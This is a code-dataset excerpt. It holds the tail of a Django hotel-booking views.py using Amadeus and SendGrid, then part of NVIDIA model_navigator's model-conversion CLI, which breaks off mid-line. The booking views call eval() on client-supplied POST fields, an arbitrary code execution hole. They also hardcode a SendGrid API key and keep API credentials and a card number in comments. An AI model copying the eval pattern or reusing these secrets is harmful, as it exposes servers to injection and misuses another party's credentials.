checkinout = \"Not availlable\"\n cancellation = \"Not availlable\"\n try:\n offerid = myconst.get('offers', )[0].get('id', ),\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n citycode = myconst.get('hotel', ).get('cityCode', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n countrycode = myconst.get('hotel', ).get('address', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n availability = myconst.get('available', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n roomtype = myconst.get('offers', )[0].get('room', ).get('type', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n roomcat = myconst.get('offers', )[0].get('room', ).get('typeEstimated', ).get('category', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n bed = myconst.get('offers', )[0].get('room', ).get('typeEstimated', ).get('bedType', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n boardtype = myconst.get('offers', )[0].get('boardType', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkindate = myconst.get('offers', )[0].get('checkInDate', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkout = myconst.get('offers', )[0].get('checkOutDate', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n typeestimated = myconst.get('offers', )[0].get('room', ).get('typeEstimated', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n description = myconst.get('offers', )[0].get('room', ).get('description', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n guests = myconst.get('offers', )[0].get('guests', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n currency = myconst.get('offers', )[0].get('price', ).get('currency', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n\n print(e)\n try:\n base = myconst.get('offers', )[0].get('price', ).get('base', ),\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n total = myconst.get('offers', )[0].get('price', ).get('total', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n pricevariations = myconst.get('offers', )[0].get('price', ).get('variations', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n bedtype = myconst.get('offers', )[0].get('room', ).get('typeEstimated', ).get('bedType', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n creitcards = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get(\n 'acceptedPayments', ).get('creditCards', ),\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n acceptedPaymnts = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get(\n 'acceptedPayments', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n paymenttype = myconst.get('offers', )[0].get('policies', ).get('paymentType', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n checkinout = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n cancellation = myconst.get('offers', )[0].get('policies', ).get('cancellation', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n mycontext = {\n 'offerid': offerid,\n\n 'citycode': citycode,\n 'countrycode': countrycode,\n 'availability': availability,\n 'roomtype': roomtype,\n 'roomcat': roomcat,\n 'bed': bed,\n 'bedtype': bedtype,\n 'checkindate': checkindate,\n 'checkout': checkout,\n 'boardtype': boardtype,\n 'typeestimated': typeestimated,\n 'description': description,\n 'guests': guests,\n 'currency': currency,\n 'base': base,\n 'total': total,\n 'pricevariations': pricevariations,\n 'creitcards': creitcards,\n 'acceptedPaymnts': acceptedPaymnts,\n 'paymenttype': paymenttype,\n 'checkinout': checkinout,\n 'cancellation': cancellation,\n 'hotelname': hotelname,\n\n }\n\n room = k\n context = {\n 'mycontext': mycontext,\n 'hoteldetailslist': hoteldetailslist,\n 'hoteldetails': hoteldetails,\n 'latitude': latitude,\n 'longitude': longitude,\n 'cityname': cityname,\n 'line': line,\n 'room': room,\n\n }\n\n print(\"---------------------------------------------------------------\", offerid)\n\n return render(request, 'roomdetails.html', context)\n\n else:\n return render(request, 'roomdetails.html')\n\n\nroomdetailslist = []\n\n\ndef bookingform(request, offerid):\n if request.method == 'POST':\n roomdetailslist.clear()\n hoteldetails = request.POST.get('hoteldetails', )\n roomdetails = request.POST.get('room', )\n roomdetails = eval(roomdetails)\n myconst = roomdetails\n\n checkindate = \"Not availlable\"\n checkout = \"Not availlable\"\n pricevariations = \"Not availlable\"\n creitcards = \"Not availlable\"\n acceptedPaymnts = \"Not availlable\"\n acceptedPayments = \"Not availlable\"\n\n paymenttype = \"Not availlable\"\n checkintime = \"Not availlable\"\n checkouttime = \"Not availlable\"\n cancellation = \"Not availlable\"\n total = \"Not availlable\"\n\n # percentage=\n base = \"Not availlable\"\n taxes = \"Not availlable\"\n currency = \"Not availlable\"\n\n try:\n checkindate = myconst.get('offers', )[0].get('checkInDate', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkout = myconst.get('offers', )[0].get('checkOutDate', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n pricevariations = myconst.get('offers', )[0].get('price', ).get('variations', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n creitcards = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get('acceptedPayments', ).get(\n 'creditCards', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n acceptedPayments = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get(\n 'acceptedPayments', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n acceptedPayments = myconst.get('offers', )[0].get('policies', ).get('deposit', ).get(\n 'acceptedPayments', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n paymenttype = myconst.get('offers', )[0].get('policies', ).get('paymentType', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkintime = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ).get('checkIn', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkouttime = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ).get('checkOut', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n cancellation = myconst.get('offers', )[0].get('policies', ).get('cancellation', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n total = myconst.get('offers', )[0].get('price', ).get('total', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n base = myconst.get('offers', )[0].get('price', ).get('base', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n taxes = myconst.get('offers', )[0].get('price', ).get('total', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n currency = myconst.get('offers', )[0].get('price', ).get('currency', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n if base == None:\n try:\n base = myconst.get('offers')[0].get('price').get('variations').get('changes')[0].get('base')\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n tax = \"Not Avaiabe\"\n try:\n tax = float(total) - float(base)\n except TypeError as e:\n print(e)\n print(tax)\n\n room = {\n\n 'checkindate': checkindate,\n 'checkout': checkout,\n 'pricevariations': pricevariations,\n 'creitcards': creitcards,\n 'acceptedPayments': acceptedPayments,\n 'paymenttype': paymenttype,\n 'checkintime': checkintime,\n 'checkouttime': checkouttime,\n 'cancellation': cancellation,\n 'total': total,\n\n # 'percentage':percentage ,\n 'base': base,\n 'tax': tax,\n 'currency': currency,\n\n }\n roomdetailslist.append(room)\n\n k = eval(hoteldetails)\n\n media = \"Not availlable\"\n cityname = \"Not availlable\"\n hotelname = \"Not availlable\"\n line = \"Not availlable\"\n ammenitiesraw = \"Not availlable\"\n\n try:\n media = k.get('hotel', ).get('media', )[0].get('uri', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n cityname = k.get('hotel', ).get('address', ).get('cityName', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n hotelname = k.get('hotel', ).get('name', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n line = k.get('hotel', ).get('address', ).get('lines', )[0]\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n ammenitiesraw = k.get('hotel', ).get('amenities', )[:3]\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n ammenities = []\n for i in ammenitiesraw:\n i = i.replace('_', ' ')\n\n i = i.lower()\n ammenities.append(i)\n\n context = {\n 'offerid': offerid,\n 'cityname': cityname,\n 'hotelname': hotelname,\n 'line': line,\n 'media': media,\n 'ammenities': ammenities,\n 'roomdetailslist': roomdetailslist,\n 'hoteldetails': hoteldetails,\n }\n\n print(\"---------------------------------------------------------------\", offerid)\n\n return render(request, 'book.html', context)\n else:\n\n return render(request, 'book.html')\n\n\nbookcontext = []\n\n\ndef book(request, offerid):\n bookcontext.clear()\n if request.method == 'POST':\n hoteldetails = request.POST.get('hoteldetails', )\n roomdetails = request.POST.get('roomdetails', )\n\n title = request.POST.get('title', )\n firstname = request.POST.get('FirstName', )\n lastname = request.POST.get('LastName', )\n phoneno = request.POST.get('phone', )\n email = request.POST.get('email', )\n cardVendorCode = request.POST.get('card_vendor_code', )\n Card_number = request.POST.get('card_number', )\n Expiry = request.POST.get('expiry', )\n # print(offerid, title, firstname, lastname, email, phoneno,cardVendorCode,Card_number,Expiry)\n offer = offerid\n\n k = eval(hoteldetails)\n room = eval(roomdetails)\n # print(\"this is expiry---------------------- \", Expiry)\n\n ammenitiesraw = \"Not availlable\"\n media = \"Not availlable\"\n cityname = \"Not availlable\"\n hotelname = \"Not availlable\"\n line = \"Not availlable\"\n latitude = \"Not availlable\"\n longitude = \"Not availlable\"\n phone = \"Not availlable\"\n\n try:\n ammenitiesraw = k.get('hotel', ).get('amenities', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n media = k.get('hotel', ).get('media', )[0].get('uri', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n cityname = k.get('hotel', ).get('address', ).get('cityName', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n hotelname = k.get('hotel', ).get('name', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n line = k.get('hotel', ).get('address', ).get('lines', )[0]\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n latitude = k.get('hotel', ).get('latitude', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n longitude = k.get('hotel', ).get('longitude', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n phone = k.get('hotel', ).get('contact', ).get('phone', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n # amadeus = Client(\n # client_id='3MCFjLGhW3lJwBJtdAMirNGkc8FUoL4s',\n # client_secret='OJEffyNYNtbPandi',\n #\n # )\n\n try:\n\n # offer = \"OXZEHRM5GS\"\n # #\n # guests = [{'id': 1, 'name': {'title': 'MR', 'firstName': 'BOB', 'lastName': 'SMITH'},\n # 'contact': {'phone': '+33679278416', 'email': 'bob.smith@email.com'}}]\n # payments = {'id': 1, 'method': 'creditCard',\n # 'card': {'vendorCode': 'VI', 'cardNumber': '4151289722471370', 'expiryDate': '2021-08'}}\n guests = [{'id': 1,'name': {'title': title, 'firstName': firstname, 'lastName': lastname},\n 'contact': {'phone': phone, 'email': email}}]\n payments = {'method': 'creditCard',\n 'card': {'vendorCode': cardVendorCode, 'cardNumber': Card_number,\n 'expiryDate': Expiry}} # '2021-08'\n\n hotel_booking = amadeus.booking.hotel_bookings.post(offer, guests, payments)\n\n data = hotel_booking.data\n # print('this is data',data)\n\n except ResponseError as error:\n print('this is ', error)\n return render(request, 'bookfailed.html', )\n\n\n\n else:\n confirmationID = \"Not available\"\n providerConfirmationId = \"Not available\"\n try:\n confirmationID = data[0].get('id', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n providerConfirmationId = data[0].get('providerConfirmationId', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n # try:\n # offer_availability = amadeus.shopping.hotel_offer(offerid).get()\n # # print('this is offer availlability', offer_availability.data)\n # k = offer_availability.data\n # # print('i have offer availlability')\n #\n # except ResponseError as error:\n # print('this is ', error)\n #\n #\n # else:\n myconst = room\n\n checkindate = \"Not availlable\"\n checkout = \"Not availlable\"\n pricevariations = \"Not availlable\"\n creitcards = \"Not availlable\"\n acceptedPaymnts = \"Not availlable\"\n acceptedPayments = \"Not availlable\"\n\n paymenttype = \"Not availlable\"\n checkintime = \"Not availlable\"\n checkouttime = \"Not availlable\"\n cancellation = \"Not availlable\"\n total = \"Not availlable\"\n\n # percentage=\n base = \"Not availlable\"\n taxes = \"Not availlable\"\n currency = \"Not availlable\"\n\n try:\n checkindate = myconst.get('checkindate', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkout = myconst.get('checkout', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n pricevariations = myconst.get('pricevariations', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n # try:\n # creitcards = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get(\n # 'acceptedPayments', ).get('creditCards', )\n #\n # except ( KeyError,AttributeError, TypeError ) as e:\n # print(e)\n try:\n acceptedPayments = myconst.get('acceptedPayments')\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n # try:\n # paymenttype = myconst.get('offers', )[0].get('policies', ).get('paymentType', )\n #\n # except ( KeyError,AttributeError, TypeError ) as e:\n # print(e)\n try:\n checkintime = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ).get('checkIn',\n )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkouttime = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ).get(\n 'checkOut', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n cancellation = myconst.get('cancellation')\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n total = myconst.get('total', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n base = myconst.get('base', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n taxes = myconst.get('tax', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n currency = myconst.get('currency', )\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n tax = \"None\"\n try:\n tax = float(total) - float(base)\n except (ValueError) as e:\n print(e)\n\n guests = \" \"\n\n try:\n guests = myconst.get('offers', )[0].get('guests', ).get('adults', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n booking = Bookings(first_name=firstname, last_name=lastname, email=email, phone=phoneno,\n\n image=media, offerid=offerid, confirmationID=confirmationID,\n providerConfirmationId=providerConfirmationId, Check_in=checkindate, Check_out=checkout,\n Guests=guests, Price=total, currency=currency, hotel_name=hotelname, )\n booking.save()\n\n # sending booking mail\n ms = '''\n\n\n\n

Booking successfull.

\n

Hello {firstname},

\n
Your booking Confirmation Id is : {confirmationID}.
\n your provider confirmation ID is: { providerConfirmationId }\n\n\n\n\n '''\n\n message = Mail(\n from_email='info@sky-swift.com',\n to_emails=email,\n subject='Hotel Booking',\n html_content=ms,\n\n )\n\n try:\n sg = SendGridAPIClient('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')\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n\n except Exception as e:\n print('not working', e)\n\n context = {\n 'email': email,\n 'firstname': firstname,\n\n 'lastname': lastname,\n 'phone': phone,\n 'cityname': cityname,\n 'latitude': latitude,\n 'longitude': longitude,\n 'line': line,\n 'hotelname': hotelname,\n 'checkindate': checkindate,\n 'checkout': checkout,\n 'pricevariations': pricevariations,\n 'creitcards': creitcards,\n 'acceptedPayments': acceptedPayments,\n 'paymenttype': paymenttype,\n 'checkintime': checkintime,\n 'checkouttime': checkouttime,\n 'cancellation': cancellation,\n 'total': total,\n 'confirmationID': confirmationID,\n\n 'providerConfirmationId': providerConfirmationId,\n\n # 'percentage':percentage ,\n 'base': base,\n 'tax': tax,\n 'currency': currency,\n }\n\n bookcontext.append(context)\n\n context = {\n 'bookcontext': bookcontext,\n }\n return render(request, 'bookconf.html', context)\n\n# #\n# # def apicall(request):\n# # return render(request,'index.html')\n# from sendgrid import SendGridAPIClient\n# from sendgrid.helpers.mail import Mail\n# from .utils import account_activation_token\n#\n#\n# @sync_to_async\n# def crunching_stuff():\n# sleep(20)\n# json_payload = {\n# \"message\": \"Hello world\"\n# }\n# print(\"Woke up after 10 seconds!\")\n# return json_payload\n#\n# async def apicall(request):\n#\n# \"\"\"\n# or also\n# asyncio.ensure_future(crunching_stuff())\n# loop.create_task(crunching_stuff())\n# \"\"\"\n#\n# asyncio.create_task(crunching_stuff())\n# q=crunching_stuff()\n#\n# context = {\n# 'q':q\n# }\n# return render(request, 'index.html', context)\n#\n# #\n# # def apicall(request):\n# # q=crunching_stuff()\n# # context={\n# # 'q':q\n# # }\n# # return render(request, 'index.html',context)\n#\n#\n# def loginfunction(request):\n# if request.method == 'POST':\n# pass\n# else:\n#\n#\n# return render(request,'login.html')\n#\n#\n# def signup(request):\n# if request.method=='POST':\n# pass\n# else:\n# return render(request,'signup.html')\n#\n#\n#\n# def signup(request):\n# if request.method == \"POST\":\n# email = request.POST.get('email', False)\n# password = request.POST['password']\n# confirm_password = request.POST['confirmpassword']\n# print(email,password)\n#\n# # if re.fullmatch(r'[A-Za-z0-9]{8,}', password):\n#\n# if password == confirm_password:\n# # l, u, p, d = 0, 0, 0, 0\n# #\n# # s = password\n# # if (len(s) >= 8):\n# # for i in s:\n# #\n# # # counting lowercase alphabets\n# # if (i.islower()):\n# # l += 1\n# #\n# # # counting uppercase alphabets\n# # if (i.isupper()):\n# # u += 1\n# #\n# # # counting digits\n# # if (i.isdigit()):\n# # d += 1\n# #\n# # # counting the mentioned special characters\n# # if (i == '@' or i == '$' or i == '_'):\n# # p += 1\n# # if (l >= 1 and u >= 1 and p >= 1 and d >= 1 and l + p + u + d == len(s)):\n# # print(\"Valid Password\")\n# if User.objects.filter(email=email).exists():\n#\n# messages.warning(request, 'Email exists!')\n# return render(request, 'signup.html')\n#\n#\n# else:\n# user = User.objects.create_user(email=email, username=email, password=password\n# )\n# user.save()\n# messages.success(request, 'Account created sucessfully!')\n# user = authenticate(username=email, password=password)\n# login(request,user)\n# user.refresh_from_db()\n#\n#\n#\n#\n#\n#\n# return redirect('/')\n#\n# # else:\n# # print(\"Invalid Password\")\n# # messages.warning(request, 'Password Must contain numbers,letters and Symbols!')\n# #\n# # return render(request,'signup.html')\n#\n# # # send_mail(\n# # # 'Account creation',\n# # # 'Hello,welcome to the Maskani family. Your account creation was successful.Should you have any queries just send us an email or call our customer care numbers. here is a guide to get you started',\n# # # 'firstregapp@gmail.com',\n# # # [email],\n# # # fail_silently=True,\n# # #\n# # # )\n# #\n# # print(\"sign up sucessful\")\n# #\n# # return redirect('/')\n# # # else:\n# # return HttpResponse('invalid email')\n# else:\n# messages.info(request, 'Passwords do not match!')\n# return render(request,'signup.html')\n#\n# # else:\n# # return HttpResponse('password must contain charachters,numbers and uppercase letters')\n#\n# else:\n# return render(request,'signup.html')\n#\n#\n# def login_function(request):\n# if request.method==\"POST\":\n# username = request.POST.get('email', False)\n# password = request.POST['password']\n# user = authenticate(username=username, password=password)\n#\n# if user is not None:\n# if user.is_active:\n# login(request, user)\n#\n#\n#\n#\n# return redirect('/')\n# # return HttpResponse(f'{ profile }')#f'profileupdate/{pk}/update\n# else:\n# messages.info(request, 'Your Account is Inactive')\n# return render(request,'login.html')\n#\n# else:\n# messages.info(request, 'Wrong username/Password!')\n# return render(request,'login.html')\n#\n# else:\n# return render(request,'login.html')\n#\n#\n\n\n#\n#\n#\n","sub_path":"hotels/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":44548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"641887179","text":"# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport dataclasses\nimport itertools\nimport logging\nimport os\nimport shutil\nimport sys\nfrom pathlib import Path\nfrom typing import List, Optional, Sequence\n\nimport click\nfrom docker.errors import DockerException\nfrom docker.types import DeviceRequest\nfrom docker.utils import parse_repository_tag\n\nfrom model_navigator.cli.spec import (\n ComparatorConfigCli,\n ConversionSetConfigCli,\n DatasetProfileConfigCli,\n ModelConfigCli,\n ModelSignatureConfigCli,\n)\nfrom model_navigator.constants import MODEL_NAVIGATOR_DIR\nfrom model_navigator.converter import (\n ComparatorConfig,\n ConversionConfig,\n ConversionLaunchMode,\n ConversionResult,\n Converter,\n DatasetProfileConfig,\n)\nfrom model_navigator.converter.config import TensorRTPrecision\nfrom model_navigator.converter.utils import FORMAT2FRAMEWORK\nfrom model_navigator.device.utils import get_gpus\nfrom model_navigator.exceptions import ModelNavigatorCliException, ModelNavigatorException\nfrom model_navigator.framework import SUFFIX2FRAMEWORK\nfrom model_navigator.log import init_logger, log_dict\nfrom model_navigator.model import Format, Model, ModelConfig, ModelSignatureConfig\nfrom model_navigator.results import ResultsStore, State\nfrom model_navigator.utils import Workspace\nfrom model_navigator.utils.cli import clean_workspace_if_needed, common_options, options_from_config\nfrom model_navigator.utils.config import BaseConfig, YamlConfigFile\nfrom model_navigator.utils.docker import DockerBuilder, DockerImage\nfrom model_navigator.utils.source import navigator_install_url, navigator_is_editable\nfrom model_navigator.validators import run_command_validators\n\nLOGGER = logging.getLogger(\"convert\")\n\n_RUN_BY_MODEL_NAVIGATOR = \"MODEL_NAVIGATOR_RUN_BY\"\n\nTRITON_SUPPORTED_FORMATS = [Format.TF_SAVEDMODEL, Format.ONNX, Format.TENSORRT, Format.TORCHSCRIPT]\n\n\n@dataclasses.dataclass\nclass ConversionSetConfig(BaseConfig):\n target_formats: List[Format] = dataclasses.field(default_factory=lambda: TRITON_SUPPORTED_FORMATS)\n target_precisions: List[TensorRTPrecision] = dataclasses.field(\n default_factory=lambda: [TensorRTPrecision.FP16, TensorRTPrecision.TF32]\n )\n # ONNX related\n onnx_opsets: List[int] = dataclasses.field(default_factory=lambda: [13])\n # TRT related\n max_workspace_size: Optional[int] = None\n\n def __iter__(self):\n parameters = [self.target_formats, self.onnx_opsets]\n combinations = itertools.product(*parameters)\n # FIXME: this is workaround for now\n for target_format, onnx_opset in combinations:\n if target_format == Format.TENSORRT:\n yield from self._tensorrt_config(onnx_opset)\n else:\n yield from self._conversion_config(target_format, onnx_opset)\n\n @classmethod\n def from_single_config(cls, config: ConversionConfig):\n if not config.target_format:\n return cls(\n target_formats=[],\n target_precisions=[],\n onnx_opsets=[],\n max_workspace_size=config.max_workspace_size,\n )\n\n return cls(\n target_formats=[config.target_format],\n target_precisions=[config.target_precision] if config.target_precision else [],\n onnx_opsets=[config.onnx_opset] if config.onnx_opset else [],\n max_workspace_size=config.max_workspace_size,\n )\n\n def _tensorrt_config(self, onnx_opset):\n for target_precision in self.target_precisions:\n config = ConversionConfig(\n target_format=Format.TENSORRT,\n target_precision=target_precision,\n onnx_opset=onnx_opset,\n max_workspace_size=self.max_workspace_size,\n )\n yield config\n\n def _conversion_config(self, target_format, onnx_opset):\n config = ConversionConfig(\n target_format=target_format,\n target_precision=None,\n onnx_opset=onnx_opset,\n max_workspace_size=self.max_workspace_size,\n )\n yield config\n\n\ndef _run_locally(\n *,\n workspace: Workspace,\n override_workspace: bool = False,\n src_model_config: ModelConfig,\n model_signature_config: Optional[ModelSignatureConfig] = None,\n conversion_set_config: ConversionSetConfig,\n comparator_config: Optional[ComparatorConfig] = None,\n dataset_profile_config: Optional[DatasetProfileConfig] = None,\n verbose: bool = False,\n) -> Sequence[ConversionResult]:\n if not os.environ.get(_RUN_BY_MODEL_NAVIGATOR):\n clean_workspace_if_needed(workspace, override_workspace)\n\n converter = Converter(workspace=workspace, verbose=verbose)\n conversion_results = []\n for conversion_config in conversion_set_config:\n results = converter.convert(\n src_model=src_model_config,\n conversion_config=conversion_config,\n signature_config=model_signature_config,\n comparator_config=comparator_config,\n dataset_profile_config=dataset_profile_config,\n )\n\n results = list(results)\n conversion_results.extend(results)\n\n return conversion_results\n\n\ndef _run_in_docker(\n *,\n workspace: Workspace,\n override_workspace: bool = False,\n src_model_config: ModelConfig,\n model_signature_config: Optional[ModelSignatureConfig] = None,\n conversion_set_config: ConversionSetConfig,\n comparator_config: Optional[ComparatorConfig] = None,\n dataset_profile_config: Optional[DatasetProfileConfig] = None,\n framework_docker_image: str,\n model_format: Format,\n gpus: Optional[List[str]] = None,\n verbose: bool = False,\n override_conversion_container: bool = False,\n) -> Sequence[ConversionResult]:\n clean_workspace_if_needed(workspace, override_workspace)\n\n config_path = workspace.path / \"convert.yaml\"\n with YamlConfigFile(config_path) as config_file:\n config_file.save_config(src_model_config)\n config_file.save_config(model_signature_config)\n config_file.save_config(conversion_set_config)\n config_file.save_config(comparator_config)\n config_file.save_config(dataset_profile_config)\n\n framework = FORMAT2FRAMEWORK[model_format]\n _, framework_docker_tag = parse_repository_tag(framework_docker_image)\n converter_docker_image = f\"model_navigator_converter:{framework_docker_tag}\"\n\n build_args = {\n \"FROM_IMAGE_NAME\": framework_docker_image,\n }\n\n if navigator_is_editable():\n dockerfile_path = MODEL_NAVIGATOR_DIR / \"model_navigator/converter/Dockerfile.local\"\n else:\n dockerfile_path = MODEL_NAVIGATOR_DIR / \"model_navigator/converter/Dockerfile.remote\"\n install_url = navigator_install_url(framework)\n build_args[\"INSTALL_URL\"] = install_url\n\n LOGGER.debug(f\"Base converter image: {framework_docker_image}\")\n LOGGER.debug(f\"Converter image: {converter_docker_image}\")\n\n conversion_image = DockerImage(converter_docker_image)\n if not conversion_image.exists() or override_conversion_container:\n conversion_image = DockerBuilder().build(\n dockerfile_path=dockerfile_path,\n image_name=converter_docker_image,\n workdir_path=MODEL_NAVIGATOR_DIR,\n build_args=build_args,\n )\n\n # run docker container\n verbose_flag = \"-v\" if verbose else \"\"\n workspace_flags = f\"--workspace-path {workspace.path}\"\n workspace_flags += \" --override-workspace\" if override_workspace else \"\"\n cmd = (\n \"bash -c 'model-navigator convert \"\n f\"--config-path {config_path} \"\n f\"--launch-mode local \"\n f\"{verbose_flag} \"\n f\"{workspace_flags}'\"\n )\n gpus = get_gpus(gpus)\n devices = [DeviceRequest(device_ids=[gpus[0]], capabilities=[[\"gpu\"]])]\n cwd = Path.cwd()\n\n required_paths = [workspace.path, src_model_config.model_path.parent, cwd]\n required_paths = sorted({p.resolve() for p in required_paths})\n\n env = {\"PYTHONPATH\": cwd.resolve().as_posix(), _RUN_BY_MODEL_NAVIGATOR: 1}\n container = conversion_image.run_container(\n devices=devices, workdir_path=cwd, mount_as_volumes=required_paths, environment=env\n )\n\n try:\n LOGGER.debug(f\"Running cmd: {cmd}\")\n container.run_cmd(cmd, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr)\n except DockerException as e:\n raise e\n finally:\n LOGGER.debug(f\"Killing docker container {container.id[:8]}\")\n container.kill()\n\n results_store = ResultsStore(workspace)\n results = results_store.load(\"convert_model\")\n\n # update framework_docker_image when run conversion in docker container\n results = [dataclasses.replace(result, framework_docker_image=framework_docker_image) for result in results]\n results_store.dump(\"convert_model\", results)\n\n return results\n\n\ndef _copy_to_output_path(conversion_results: Sequence[ConversionResult], output_path):\n output_path = Path(output_path)\n\n successful_conversion_results = [r for r in conversion_results if r.status.state == State.SUCCEEDED]\n\n result_to_copy = None\n if not successful_conversion_results:\n LOGGER.warning(\"Obtained no successful conversion results for given model and conversion parameters\")\n elif len(successful_conversion_results) > 1:\n msg = f\"Obtained more than 1 successful conversion result - copy just first one into {output_path}.\"\n LOGGER.warning(msg)\n result_to_copy = successful_conversion_results[0]\n else:\n result_to_copy = successful_conversion_results[0]\n\n if result_to_copy is not None:\n result_model_path = result_to_copy.output_model.path\n LOGGER.debug(f\"Copy {result_model_path} to {output_path}\")\n if result_model_path.is_dir():\n shutil.copytree(result_model_path, output_path)\n else:\n shutil.copy(result_model_path, output_path)\n # copy also supplementary files - ex. model io annotation file\n # they have just changed suffix comparing to model path\n for supplementary_file in result_model_path.parent.glob(f\"{result_model_path.stem}.*\"):\n if supplementary_file == result_model_path:\n continue\n supplementary_file_output_path = output_path.parent / f\"{output_path.stem}{supplementary_file.suffix}\"\n LOGGER.debug(f\"Copy {supplementary_file} to {supplementary_file_output_path}\")\n shutil.copy(supplementary_file, supplementary_file_output_path)\n\n\n# TODO: nargs????\n\n\ndef convert(\n *,\n workspace_path: Path,\n override_workspace: bool,\n verbose: bool,\n output_path: Optional[str],\n container_version: str,\n framework_docker_image: Optional[str],\n gpus: Optional[List[str]],\n launch_mode: ConversionLaunchMode = ConversionLaunchMode.DOCKER,\n override_conversion_container: bool = False,\n **kwargs,\n):\n src_model_config = ModelConfig.from_dict(kwargs)\n src_model_signature_config = ModelSignatureConfig.from_dict(kwargs)\n conversion_set_config = ConversionSetConfig.from_dict(kwargs)\n comparator_config = 